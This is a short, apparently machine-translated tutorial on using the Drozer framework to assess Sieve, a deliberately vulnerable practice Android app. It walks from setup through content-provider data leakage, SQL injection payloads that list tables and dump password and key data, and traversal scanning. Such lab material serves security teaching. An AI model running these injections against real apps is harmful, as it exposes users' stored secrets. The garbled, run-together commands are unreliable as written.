First, install and start 1.installation
First step: Download Drozer from Http://mwr.to/drozer (Windows Installer)
Step Two: install agent.apk on your Android device
ADB install agent.apk
2.Start
First step: use adb on the PC for port forwarding and forwarding to the port used by Drozer 31415
ADB forward TCP:31415 tcp:31415
Step two: Turn on the Drozer Agent on your Android device
Select Embedded Server-enable
Step three: open The Drozer console on the PC
Second, the test steps
1. Get the package name
Dz> Run App.package.list-f sievecom.mwr.example.sieve
2. Get basic information about your app
Run App.package.info-a Com.mwr.example.sieve
3. Identify the attack surface
Run App.package.attacksurface Com.mwr.example.sieve
4.Activity
(1) get activity Information
Run App.activity.info-a Com.mwr.example.sieve
(2) Activate activity
Run App.activity.start--component Com.mwr.example.sievedz> Help app.activity.startusage:run App.activity.start [-h] [--action action] [--category category][--component package component] [--data- URI Data_uri] [--extra TYPE KEY VALUE] [--Flagsflags [flags ...]] [--mimetype MimeType]
5.Content Provider
(1) get content Provider information
Run App.provider.info-a Com.mwr.example.sieve
(2) Content Providers(data leakage)
Get all the URIsyou can access first:
Run Scanner.provider.finduris-a Com.mwr.example.sieve
Get the data for each Uri :
Run App.provider.querycontent: // com.mwr.example.sieve.dbcontentprovider/passwords/--vertical
A vulnerability exists in the query to the data description
(3) Content Providers(SQL injection)
Run App.provider.query content: // com.mwr.example.sieve.dbcontentprovider/passwords/--projection "'" Run App.provider.query content: // com.mwr.example.sieve.dbcontentprovider/passwords/--selection "'"
An error indicates that there is a SQL injection.
List all tables:
Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection "* From Sqlite_master WHERE type= ' table ';--"
Getthe data in a table (such as Key):
Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection "* From key;--"
(4) Simultaneous detection of SQL injection and directory traversal
Run Scanner.provider.injection-a Com.mwr.example.sieve
6.Service
(1) Get service details
Run App.service.info-a Com.mwr.example.sieve
7. Other Modules
/tools.file.download Upload//TOOLS.SETUP.MINIMALSU Install available binaries